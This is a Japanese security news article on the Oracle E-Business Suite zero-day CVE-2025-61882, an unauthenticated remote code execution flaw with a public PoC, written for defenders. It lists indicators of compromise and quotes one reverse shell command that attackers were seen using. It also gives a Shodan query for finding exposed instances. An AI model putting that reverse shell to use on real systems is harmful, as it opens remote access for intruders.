Oracle E-Business Suite のゼロデイ脆弱性 CVE-2025-61882:認証不要の RCE と PoC の公開

PoC Exploit Released for Remotely Exploitable Oracle E-Business Suite 0-Day Vulnerability

2025/10/06 CyberSecurityNews — Oracle が公表したのは、Oracle E-Business Suite のゼロデイ脆弱性 CVE-2025-61882 (CVSS 3.1:9.8) に対する PoC エクスプロイト・コードが公開され、企業環境に重大な脅威が浮上していることだ。この認証が不要なリモート・コード実行 (RCE) 脆弱性が悪用されると、Oracle Concurrent Processing の BI Publisher Integration コンポーネントを標的とする、HTTP プロトコル経由での攻撃が生じる。この脆弱性が影響を及ぼす範囲は、Oracle E-Business Suite バージョン 12.2.3~12.2.14 である。

Oracle E-Business Suite の RCE 脆弱性

セキュリティ研究者たちが特定したのは、未認証のリモート攻撃者が HTTP を介した複雑性の低い攻撃で、脆弱な Oracle E-Business Suite 上での任意のコード実行を可能にすることだ。Oracle のセキュリティ・アドバイザリで、この脆弱性は未認証の攻撃者によるリモート悪用と分類されており、機密性/完全性/可用性に対して高い影響を与える。

ユーザー組織に対して推奨されるのは、Nuclei 検出テンプレートを用いた “E-Business Suite Home Page” テキストの確認である。Last-Modified ヘッダのタイムスタンプが、2025年10月4日以前であれば、パッチ未適用の脆弱なインスタンスだと判断できる。

ユーザーに対して強く推奨されるのは、Oracle 2023年10月版 Critical Patch Update の適用を前提とした、新たなセキュリティ・パッチの速やかな適用である。なお、この更新日より前の変更日付を持つシステムは、パッチが未適用の脆弱な状態にあり、悪用される可能性がある。

Risk FactorsDetails
Affected ProductsOracle E-Business Suite 12.2.3-12.2.14
ImpactRemote Code Execution
Exploit PrerequisitesNetwork access via HTTP protocol, No authentication required
CVSS 3.1 Score9.8 (Critical)
アクティブな悪用

アクティブな悪用試行は、特定の IOC を通じて確認されている。具体的には、悪意ある IP アドレス 200[.]107[.]207[.]26/185[.]181[.]60[.]11 による GET/POST 活動が観測されている。この脅威アクターは “sh -c /bin/bash -i >& /dev/tcp// 0>&1” のようなリバースシェル・コマンドを利用して、永続的なアウト・バウンド TCP 接続を確立している。

また、エクスプロイト・ツールキット oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) と、Python エクスプロイト・スクリプト “exp.py/server.py” を取り込んだ悪意のアーティファクト、フォレンジック解析により検出された。それらが示すのは、Scattered Spider/Lapsus$/Cl0p といった既知の脅威グループとの関連を示唆する、高度な攻撃手法の可能性である。

ユーザーに対して強く推奨されるのは、すべての影響を受ける Oracle E-Business Suite インストールに対して、直ちにパッチを適用することだ。Oracle が注意喚起するのは、Premier Support/Extended Support 下のシステムのみが、セキュリティ更新を受け取れる点である。

ユーザー組織にとって必要なことは、特定された IOC に対するネットワーク監視を実施し、利用可能な検出テンプレートおよび html:”OA_HTML” パターンをターゲットにした Shodan クエリを用いて、露出インスタンスを特定する包括的な脆弱性の評価である。

Oracle E-Business Suite に対する、未認証の RCE 攻撃に対する PoC 公開は深刻なできごとです。技術的には、Concurrent Processing の BI Publisher 統合コンポーネントが、HTTP を経由する外部からの入力を適切に検証/制限せず、また、認証や権限チェックが不足しているに起因すると考えられます。公開された PoC により、自動化されたスキャンや悪用が広がりやすく、認証が不要な任意のコード実行に至ると、この記事は指摘しています。ご利用のチームは、ご注意ください。よろしければ、Oracle E-Business Suite で検索も、ご参照ください。